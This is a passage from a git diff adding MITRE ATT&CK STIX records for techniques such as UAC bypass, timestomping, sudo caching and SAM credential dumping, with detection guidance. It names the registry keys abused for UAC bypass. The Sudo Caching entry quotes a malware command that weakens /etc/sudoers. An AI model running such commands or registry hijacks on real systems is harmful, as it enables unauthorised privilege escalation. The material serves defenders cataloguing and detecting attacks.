Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)\n\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_contributors": [ + "Stefan Kanthak", + "Casey Smith" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes.\n\nSome UAC bypass methods rely on modifying specific, user-accessible Registry settings. 
For example:\n\n* The eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Classes\\mscfile\\shell\\open\\command Registry key.(Citation: enigma0x3 Fileless UAC Bypass)\n\n* The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe and [HKEY_CURRENT_USER]\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)\n\nAnalysts should monitor these Registry settings for unauthorized changes.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Command: Command Execution", + "Windows Registry: Windows Registry Key Modification", + "Process: Process Metadata" + ], + "x_mitre_defense_bypassed": [ + "Windows User Account Control" + ], + "x_mitre_effective_permissions": [ + "Administrator" + ], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "id": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073", + "created": "2020-01-30T14:24:34.977Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1548/002", + "external_id": "T1548.002" + }, + { + "source_name": "Davidson Windows", + "description": "Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014.", + "url": "http://www.pretentiousname.com/misc/win7_uac_whitelist2.html" + }, + { + "source_name": "TechNet How UAC Works", + "description": "Lich, B. (2016, May 31). How User Account Control Works. 
Retrieved June 3, 2016.", + "url": "https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works" + }, + { + "source_name": "SANS UAC Bypass", + "description": "Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016.", + "url": "http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass" + }, + { + "source_name": "MSDN COM Elevation", + "description": "Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/ms679687.aspx" + }, + { + "source_name": "enigma0x3 Fileless UAC Bypass", + "description": "Nelson, M. (2016, August 15). \"Fileless\" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016.", + "url": "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/" + }, + { + "source_name": "enigma0x3 sdclt app paths", + "description": "Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017.", + "url": "https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/" + }, + { + "source_name": "enigma0x3 sdclt bypass", + "description": "Nelson, M. (2017, March 17). \"Fileless\" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017.", + "url": "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/" + }, + { + "source_name": "TechNet Inside UAC", + "description": "Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016.", + "url": "https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx" + }, + { + "source_name": "Fortinet Fareit", + "description": "Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. 
Retrieved December 27, 2016.", + "url": "https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware" + }, + { + "source_name": "Github UACMe", + "description": "UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.", + "url": "https://github.com/hfiref0x/UACME" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--128c55d3-aeba-469f-bd3e-c8996ab4112a.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--128c55d3-aeba-469f-bd3e-c8996ab4112a.json new file mode 100644 index 0000000000000000000000000000000000000000..ae5d484cae29ad7b73b7d3086e282d1174f76792 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--128c55d3-aeba-469f-bd3e-c8996ab4112a.json 
@@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--090f2033-eb68-4dbd-a357-7aae22dac030", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Romain Dumont, ESET" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--128c55d3-aeba-469f-bd3e-c8996ab4112a", + "type": "attack-pattern", + "created": "2017-05-31T21:31:12.675Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1099", + "url": "https://attack.mitre.org/techniques/T1099" + }, + { + "url": "http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html", + "description": "Carvey, H. (2013, July 23). HowTo: Determine/Detect the use of Anti-Forensics Techniques. Retrieved June 3, 2016.", + "source_name": "WindowsIR Anti-Forensic Techniques" + } + ], + "modified": "2020-02-18T16:56:57.039Z", + "name": "Timestomp", + "description": "Adversaries may take actions to hide the deployment of new, or modification of existing files to obfuscate their activities. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools. 
(Citation: WindowsIR Anti-Forensic Techniques)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_defense_bypassed": [ + "Host forensic analysis" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "SYSTEM" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc.json new file mode 100644 index 0000000000000000000000000000000000000000..125ac186aa27f64522aebb76e7e9048774df4527 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--fab4f989-3b6d-4e0b-b6b5-92f93c846624", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", + "type": "attack-pattern", + "created": "2021-03-17T15:28:10.689Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1016.001", + "url": "https://attack.mitre.org/techniques/T1016/001" + } + ], + "modified": "2021-03-25T17:03:26.632Z", + "name": "Internet Connection Discovery", + "description": "Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert, and GET requests to websites.\n\nAdversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. 
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Command and Control, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to check Internet connectivity.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Command: Command Execution" + ], + "x_mitre_permissions_required": [ + "User" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0.json new file mode 100644 index 0000000000000000000000000000000000000000..f990b44cf02f03eb6ea8879df86f9ed9638078d9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0.json 
@@ -0,0 +1,74 @@ +{ + "type": "bundle", + "id": "bundle--2845ee47-fb1f-4d62-9f69-e14e952bd619", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", + "type": "attack-pattern", + "created": "2020-01-30T14:34:44.992Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1548.003", + "url": "https://attack.mitre.org/techniques/T1548/003" + }, + { + "url": "https://www.sudo.ws/", + "description": "Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.", + "source_name": "sudo man page 2018" + }, + { + "url": "https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/", + "description": "Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.", + "source_name": "OSX.Dok Malware" + }, + { + "url": "https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does", + "description": "Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually Does. Retrieved March 19, 2018.", + "source_name": "cybereason osx proton" + } + ], + "modified": "2022-03-14T16:28:19.781Z", + "name": "Sudo and Sudo Caching", + "description": "Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.\n\nWithin Linux and MacOS systems, sudo (sometimes referred to as \"superuser do\") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. 
The sudo command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\"(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\n\nThe sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though.\n\nAdversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. 
Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.\n\nIn the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \\'Defaults !tty_tickets\\' >> /etc/sudoers.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: Process Metadata", + "File: File Modification", + "Process: Process Creation" + ], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_effective_permissions": [ + "root" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b.json new file mode 100644 index 0000000000000000000000000000000000000000..32f7650a72a62d344f2d073770cb22cf3c7c7d9c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--a5df32b0-7411-46a9-af1f-5f6a2c42fc56", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", + "type": "attack-pattern", + "created": "2020-02-20T21:09:55.995Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1560.003", + "url": "https://attack.mitre.org/techniques/T1560/003" + }, + { + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", + "description": "ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.", + "source_name": "ESET Sednit Part 2" + } + ], + "modified": "2020-03-25T22:48:14.605Z", + "name": "Archive via Custom Method", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. 
Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_detection": "Custom archival methods can be very difficult to detect, since many of them use standard programming language concepts, such as bitwise operations.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "File: File Creation", + "Script: Script Execution" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--144e007b-e638-431d-a894-45d90c54ab90.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--144e007b-e638-431d-a894-45d90c54ab90.json new file mode 100644 index 0000000000000000000000000000000000000000..993da4c6c55dd63668c5aad820862f1274181475 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--144e007b-e638-431d-a894-45d90c54ab90.json 
@@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--e5c601cd-5bc8-4937-a6e2-40fe86b3cc21", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90", + "type": "attack-pattern", + "created": "2019-08-30T18:03:05.864Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1578", + "url": "https://attack.mitre.org/techniques/T1578" + }, + { + "source_name": "Mandiant M-Trends 2020", + "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020", + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." + } + ], + "modified": "2021-04-20T14:51:01.759Z", + "name": "Modify Cloud Compute Infrastructure", + "description": "An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.\n\nPermissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "Establish centralized logging for the activity of cloud compute infrastructure components. 
Monitor for suspicious sequences of events, such as the creation of multiple snapshots within a short period of time or the mount of a snapshot to a new instance by a new or unexpected user. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Instance: Instance Start", + "Instance: Instance Stop", + "Instance: Instance Modification", + "Volume: Volume Metadata", + "Snapshot: Snapshot Creation", + "Instance: Instance Creation", + "Snapshot: Snapshot Deletion", + "Snapshot: Snapshot Metadata", + "Instance: Instance Metadata", + "Volume: Volume Modification", + "Snapshot: Snapshot Modification", + "Volume: Volume Creation", + "Volume: Volume Deletion", + "Instance: Instance Deletion" + ], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce.json new file mode 100644 index 0000000000000000000000000000000000000000..45d0907d9d574e048f04da7f8e169d8a32ff5be7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce.json 
@@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--b7fab7f6-15e5-4699-ba77-15ea34b43fff", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-15T17:26:53.365Z", + "name": "Permission Groups Discovery", + "description": "Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.\n\nAdversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.(Citation: CrowdStrike BloodHound April 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_contributors": [ + "Daniel Prizmant, Palo Alto Networks", + "Yuval Avrahami, Palo Alto Networks", + "Microsoft Threat Intelligence Center (MSTIC)" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). 
Monitor container logs for commands and/or API calls related to listing permissions for pods and nodes, such as kubectl auth can-i.(Citation: K8s Authorization Overview)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace", + "Containers" + ], + "x_mitre_version": "2.5", + "x_mitre_data_sources": [ + "Group: Group Enumeration", + "Command: Command Execution", + "Process: Process Creation", + "Group: Group Metadata", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "created": "2017-05-31T21:30:55.471Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1069", + "external_id": "T1069" + }, + { + "source_name": "K8s Authorization Overview", + "description": "Kubernetes. (n.d.). Authorization Overview. Retrieved June 24, 2021.", + "url": "https://kubernetes.io/docs/reference/access-authn-authz/authorization/" + }, + { + "source_name": "CrowdStrike BloodHound April 2018", + "description": "Red Team Labs. (2018, April 24). Hidden Administrative Accounts: BloodHound to the Rescue. Retrieved October 28, 2020.", + "url": "https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f.json new file mode 100644 index 0000000000000000000000000000000000000000..5af80a0fc9f0577d7f5ded1ee10eb46f2dbe59e5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f.json 
@@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--33a3b535-89fc-4278-a7f1-f0418b5292cb", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-12T20:46:04.871Z", + "name": "Email Collection", + "description": "Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_contributors": [ + "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.\n\nFile access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.\n\nMonitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nDetection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. 
It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Windows", + "Office 365", + "Google Workspace", + "macOS", + "Linux" + ], + "x_mitre_version": "2.4", + "x_mitre_data_sources": [ + "File: File Access", + "Logon Session: Logon Session Creation", + "Application Log: Application Log Content", + "Command: Command Execution", + "Network Traffic: Network Connection Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", + "created": "2017-05-31T21:31:25.454Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": 
"https://attack.mitre.org/techniques/T1114", + "external_id": "T1114" + }, + { + "source_name": "Microsoft Tim McMichael Exchange Mail Forwarding 2", + "description": "McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding. Retrieved October 8, 2019.", + "url": "https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011.json new file mode 100644 index 0000000000000000000000000000000000000000..40b02f94c487f136e91cc0dba7195fcf826a2691 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--0d1113c8-1ffe-4b2a-bf1f-585eb5a9992f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Ed Williams, Trustwave, SpiderLabs" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011", + "created": "2020-02-11T18:42:07.281Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1003.002", + "url": "https://attack.mitre.org/techniques/T1003/002" + }, + { + "source_name": "GitHub Creddump7", + "url": "https://github.com/Neohapsis/creddump7", + "description": "Flathers, R. (2018, February 19). creddump7. Retrieved April 11, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. 
